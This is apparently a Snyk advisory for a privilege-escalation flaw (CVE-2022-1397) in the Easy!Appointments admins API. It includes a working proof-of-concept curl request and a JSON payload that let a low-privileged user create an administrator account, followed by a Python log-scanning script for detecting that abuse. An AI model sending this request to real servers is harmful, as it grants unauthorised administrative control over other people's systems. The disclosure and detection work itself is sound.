Privilege Escalation Affecting alextselegidis/easyappointments package, versions >=0.0.0
Snyk CVSS: Attack Complexity: Low; Confidentiality: High; Integrity: High
Threat Intelligence: Exploit Maturity: Proof of concept; EPSS: 0.07% (30th percentile)
- Snyk ID SNYK-PHP-ALEXTSELEGIDISEASYAPPOINTMENTS-2813631
- published 11 May 2022
- disclosed 11 May 2022
- credit Francesco Carlucci
Introduced: 11 May 2022
CVE-2022-1397
How to fix?
A fix was pushed into the master branch but not yet published.
Overview
alextselegidis/easyappointments is a powerful Open Source Appointment Scheduler that can be installed on your server.
Affected versions of this package are vulnerable to Privilege Escalation via the /api/v1/admins/ endpoint, because authorization is checked only against the user's existence, without validating the user's permissions. Exploiting this vulnerability allows a low privileged user to create a new admin user.
PoC:
curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass
payload.json:
{
    "id": 100,
    "firstName": "Admin",
    "lastName": "Admin",
    "email": "admin@easyappointments.org",
    "mobile": null,
    "phone": "111",
    "address": null,
    "city": null,
    "state": null,
    "zip": null,
    "notes": null,
    "timezone": "UTC",
    "settings": {
        "username": "usern@me",
        "password": "p@ssw0rd",
        "notifications": true,
        "calendarView": "default"
    }
}
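Because the fix was not yet published when this advisory went out, a defender will want to spot the abuse pattern above in web-server logs: a write to the admins endpoint by an authenticated account that is not a known administrator. The following Python script is an added example, not code from the Snyk advisory or the Easy!Appointments project; it assumes Apache/nginx combined-format access logs (where the Basic Auth username lands in the remote-user field), a constructed sample log, and a caller-supplied set of administrator usernames.

```python
import re
from dataclasses import dataclass

# Apache/nginx "combined" access-log format. The third field (%u / $remote_user)
# records the HTTP Basic Auth username the API request was authenticated as.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Write operations on this endpoint should only ever succeed for an administrator.
# Assumption: the install may be reachable both with and without the index.php prefix.
ADMIN_ONLY_PATHS = {"/api/v1/admins", "/index.php/api/v1/admins"}
WRITE_METHODS = {"POST", "PUT", "DELETE"}

@dataclass
class Finding:
    user: str
    ip: str
    method: str
    path: str
    status: int

def find_privilege_abuse(log_lines, admin_users):
    """Return write requests to the admins endpoint made by an authenticated user
    who is not a known administrator. A 2xx status means the flawed check let the
    request through; other statuses are still returned so attempts can be triaged."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        user = m["user"]
        path = m["path"].split("?", 1)[0].rstrip("/")
        if user == "-":
            continue  # unauthenticated request, not a permission-check failure
        if m["method"] in WRITE_METHODS and path in ADMIN_ONLY_PATHS and user not in admin_users:
            findings.append(Finding(user, m["ip"], m["method"], path, int(m["status"])))
    return findings

# Constructed sample log: a low-privileged account ("alice") creating an admin,
# a legitimate administrator ("root") doing the same, and an unauthenticated attempt.
SAMPLE_LOG = [
    '203.0.113.5 - alice [11/May/2022:10:01:02 +0000] "GET /index.php/api/v1/appointments HTTP/1.1" 200 512',
    '203.0.113.5 - alice [11/May/2022:10:01:09 +0000] "POST /index.php/api/v1/admins/ HTTP/1.1" 201 340',
    '198.51.100.7 - root [11/May/2022:10:02:00 +0000] "POST /index.php/api/v1/admins/ HTTP/1.1" 201 340',
    '203.0.113.9 - - [11/May/2022:10:03:00 +0000] "POST /index.php/api/v1/admins/ HTTP/1.1" 401 0',
]

FINDINGS = find_privilege_abuse(SAMPLE_LOG, admin_users={"root"})  # one hit: alice, status 201
```

Feed it real access logs and your actual administrator list; a 2xx hit from a non-admin account is a strong signal the endpoint was abused and that the new admin account should be reviewed.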